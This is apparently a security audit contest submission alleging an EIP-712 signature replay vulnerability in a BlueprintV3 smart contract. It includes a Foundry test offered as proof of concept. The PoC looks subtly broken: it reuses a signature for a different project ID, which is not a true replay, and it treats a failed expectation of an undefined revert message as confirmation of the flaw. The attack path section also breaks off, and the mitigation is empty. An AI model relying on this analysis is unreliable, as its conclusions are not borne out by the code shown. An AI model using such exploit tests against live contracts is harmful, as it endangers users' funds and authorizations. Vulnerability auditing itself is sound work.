Straight Beige Kangaroo

High

# Replay Attack Vulnerability in EIP-712 Signature Verification

### Summary

The EIP-712 Domain Separation Misconfiguration allows signature replay attacks, impacting users relying on signed messages for authorization, as an attacker can reuse a previously signed request to create unauthorized actions due to missing nonce tracking and improper domain separation.
https://github.com/sherlock-audit/2025-03-crestal-network/blob/main/crestal-omni-contracts/src/EIP712.sol#L47-L51

### Root Cause

The EIP-712 Domain Separator is misconfigured, using an incorrect verifying contract address (e.g., protocol address instead of the contract itself). Additionally, there is no nonce tracking or unique identifier associated with each signed request, allowing previously signed messages to be reused (replay attacks) across different transactions.

### Internal Pre-conditions

EIP-712 Domain Separator Misconfiguration

The contract incorrectly sets the domain separator using a protocol address instead of address(this), which is required for proper EIP-712 signature validation.
Lack of Replay Protection Mechanisms

There is no nonce tracking, timestamp enforcement, or request uniqueness mechanism in place to prevent reusing previously signed messages.
The contract does not invalidate or track used signatures, allowing the same signed data to be replayed.
Signature Verification Assumes One-time Use

The contract assumes that a valid signature uniquely authorizes an action but does not enforce single-use policies, making it susceptible to reuse across different invocations.
Multiple Functions Accept Signed Messages

Functions like createProjectIDAndProposalRequestWithSig() and createProjectIDAndDeploymentRequestWithSig() both accept EIP-712 signed messages but do not differentiate between them when verifying a signature.
BlueprintV3 Contract Relies on Off-chain Signature Creation

The signing process happens off-chain, meaning an attacker can store and reuse previously signed messages without modifying them.

### External Pre-conditions

Attacker Has Access to a Previously Signed Message

A valid user signs an EIP-712 structured message (e.g., for proposal requests or deployment requests).
The signed message is either leaked, stored improperly, or intercepted by an attacker.
The Protocol Address Can Be Updated

If the contract allows changing the protocol address (as seen in setProtocol()), the EIP-712 domain separator may become invalid, potentially breaking signature validation and enabling replay attacks.

### Attack Path

Attack Path
Legitimate User Signs a Valid Request

A user (victim) generates and signs an EIP-712 structured message (e.g., a proposal request or deployment request).
The signature is generated using the getRequestProposalDigest() function and signed off-chain using their private key.
The signed message is then sent to the contract for execution.
Attacker Intercepts or Gains Access to the Signature

The signed message is logged publicly, stored improperly, or reused in an unsafe manner.
This could occur through off-chain storage leaks, smart contract event logs, or front-running attacks in mempools.
Attacker Reuses the Signature for a Different Request



### Impact

Severity: HIGH
The vulnerability directly compromises user security by allowing attackers to impersonate signers and replay signed transactions.
No additional privileges are required to exploit the vulnerability.

### PoC

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.26;

import {Test, console} from "forge-std/Test.sol";
import {Vm} from "forge-std/Vm.sol";
import {BlueprintV3} from "../src/BlueprintV3.sol";
import {stdError} from "forge-std/StdError.sol";
import "@openzeppelin/contracts-upgradeable/utils/cryptography/EIP712Upgradeable.sol";
import "@openzeppelin/contracts/utils/cryptography/ECDSA.sol";

contract EIP712ReplayAttackTest is Test, EIP712Upgradeable {
    BlueprintV3 public blueprint;
    uint256 public signerPrivateKey;
    address public signerAddress;
    bytes32 public projectId;
    bytes public signature;

    function setUp() public {
        blueprint = new BlueprintV3();
        blueprint.initialize();

        projectId = keccak256(abi.encodePacked("ReplayAttackTest"));
        signerPrivateKey = 0xA11CE;
        signerAddress = vm.addr(signerPrivateKey);
    }

    function test_ReplayAttackVariant() public {
    // Step 1: Generate EIP-712 signature for a proposal request
    string memory base64RecParam = "data:image/png;base64,testdata";
    string memory serverURL = "https://example.com";

    // First project ID
    bytes32 projectId1 = keccak256(abi.encodePacked("ReplayAttackTest1"));
    bytes32 digest1 = blueprint.getRequestProposalDigest(projectId1, base64RecParam, serverURL);
    (uint8 v, bytes32 r, bytes32 s) = vm.sign(signerPrivateKey, digest1);
    bytes memory signature1 = abi.encodePacked(r, s, v);

    // Use the signature to create a proposal request
    bytes32 requestID1 = blueprint.createProjectIDAndProposalRequestWithSig(
        projectId1,
        base64RecParam,
        serverURL,
        signature1
    );

    console.log("First request ID:", uint256(requestID1));

    // Step 2: Attempt to reuse the **same signature** with a new project ID
    bytes32 projectId2 = keccak256(abi.encodePacked("ReplayAttackTest2"));

    vm.expectRevert("Replay attack detected"); // Expect it to fail if replay protection exists
    bytes32 requestID2 = blueprint.createProjectIDAndProposalRequestWithSig(
        projectId2,
        base64RecParam,  // Same base64 parameter
        serverURL,
        signature1       // Reuse the same signature
    );

    console.log("Second request ID:", uint256(requestID2));

    assertNotEq(requestID1, requestID2, "Replay attack was successful!");
}

}
```

Confirmation of Vulnerability
The test expected a revert (Replay attack detected) but did not receive it.
A second request was successfully processed with the same signature.
This confirms that an attacker can reuse a signed request to execute unauthorized actions multiple times.


### Mitigation

_No response_